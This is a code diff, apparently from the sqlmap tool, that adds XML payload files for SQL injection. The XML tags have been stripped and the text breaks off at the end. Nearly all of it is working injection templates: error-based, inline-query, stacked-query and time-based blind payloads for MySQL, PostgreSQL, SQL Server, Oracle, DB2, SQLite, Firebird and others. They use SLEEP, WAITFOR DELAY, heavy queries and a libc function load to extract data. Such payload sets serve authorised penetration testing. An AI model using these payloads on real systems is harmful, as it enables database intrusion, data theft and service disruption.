+ + + IBM DB2 error-based - ORDER BY clause + 2 + 5 + 1 + 3 + 1 + ,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + ,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + + + + Microsoft SQL Server/Sybase error-based - Stacking (EXEC) + 2 + 2 + 1 + 1-8 + 1 + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR] + + ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR] + -- + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ +
diff --git a/data/xml/payloads/inline_query.xml b/data/xml/payloads/inline_query.xml new file mode 100644 index 00000000000..7269be695c4 --- /dev/null +++ b/data/xml/payloads/inline_query.xml @@ -0,0 +1,157 @@ + + + + + + Generic inline queries + 3 + 1 + 1 + 1,2,3,8 + 3 + (SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]')) + + (SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + + + + + MySQL inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + (SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL +
+
+ + + PostgreSQL inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle inline queries + 3 + 2 + 1 + 1,2,3,8 + 3 + (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL) + + + (SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + SQLite inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' + + SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ SQLite +
+
+ + + Firebird inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE + + SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + ClickHouse inline queries + 3 + 3 + 1 + 1,2,3,8 + 3 + ('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + ('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + +
diff --git a/data/xml/payloads/stacked_queries.xml b/data/xml/payloads/stacked_queries.xml new file mode 100644 index 00000000000..b431bb7849f --- /dev/null +++ b/data/xml/payloads/stacked_queries.xml @@ -0,0 +1,730 @@ + + + + + + MySQL >= 5.0.12 stacked queries (comment) + 4 + 2 + 1 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + ;SELECT SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries + 4 + 3 + 1 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + ;SELECT SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries (query SLEEP - comment) + 4 + 3 + 1 + 1-8 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 stacked queries (query SLEEP) + 4 + 4 + 1 + 1-8 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 stacked queries (BENCHMARK - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL +
+
+ + + MySQL < 5.0.12 stacked queries (BENCHMARK) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 stacked queries (comment) + 4 + 1 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 stacked queries + 4 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL stacked queries (heavy query - comment) + 4 + 2 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + -- + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL < 8.2 stacked queries (Glibc - comment) + 4 + 3 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + -- + + + + +
+ PostgreSQL + < 8.2 + Linux +
+
+ + + PostgreSQL < 8.2 stacked queries (Glibc) + 4 + 5 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + + + + +
+ PostgreSQL + < 8.2 + Linux +
+
+ + + Microsoft SQL Server/Sybase stacked queries (comment) + 4 + 1 + 1 + 1-8 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries (DECLARE - comment) + 4 + 2 + 1 + 1-8 + 1 + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x + + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries + 4 + 4 + 1 + 1-8 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase stacked queries (DECLARE) + 4 + 5 + 1 + 1-8 + 1 + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x + + ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment) + 4 + 1 + 1 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) + 4 + 4 + 1 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (heavy query - comment) + 4 + 2 + 2 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_LOCK.SLEEP - comment) + 4 + 4 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_LOCK.SLEEP) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (USER_LOCK.SLEEP - comment) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (USER_LOCK.SLEEP) + 4 + 5 + 1 + 1-8 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+
+ + + IBM DB2 stacked queries (heavy query - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + + + + +
+ IBM DB2 +
+
+ + + SQLite > 2.0 stacked queries (heavy query - comment) + 4 + 3 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + -- + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + + + + +
+ SAP MaxDB +
+
+ + + HSQLDB >= 1.7.2 stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 2.0 stacked queries (heavy query - comment) + 4 + 4 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + -- + + + + +
+ HSQLDB + >= 2.0 +
+
+ + + HSQLDB >= 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 1-8 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 2.0 +
+
+ + +
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml new file mode 100644 index 00000000000..21a50ce4016 --- /dev/null +++ b/data/xml/payloads/time_blind.xml @@ -0,0 +1,2174 @@ + + + + + + + + MySQL >= 5.0.12 AND time-based blind (query SLEEP) + 5 + 1 + 1 + 1,2,3,8,9 + 1 + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP) + 5 + 1 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP) + 5 + 2 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 AND time-based blind (BENCHMARK) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind + 5 + 2 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) + 5 + 3 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL AND time-based blind (ELT) + 5 + 3 + 1 + 1,2,3,8,9 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL OR time-based blind (ELT) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL AND time-based blind (ELT - comment) + 5 + 5 + 1 + 1,2,3,9 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
+
+ + + MySQL OR time-based blind (ELT - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
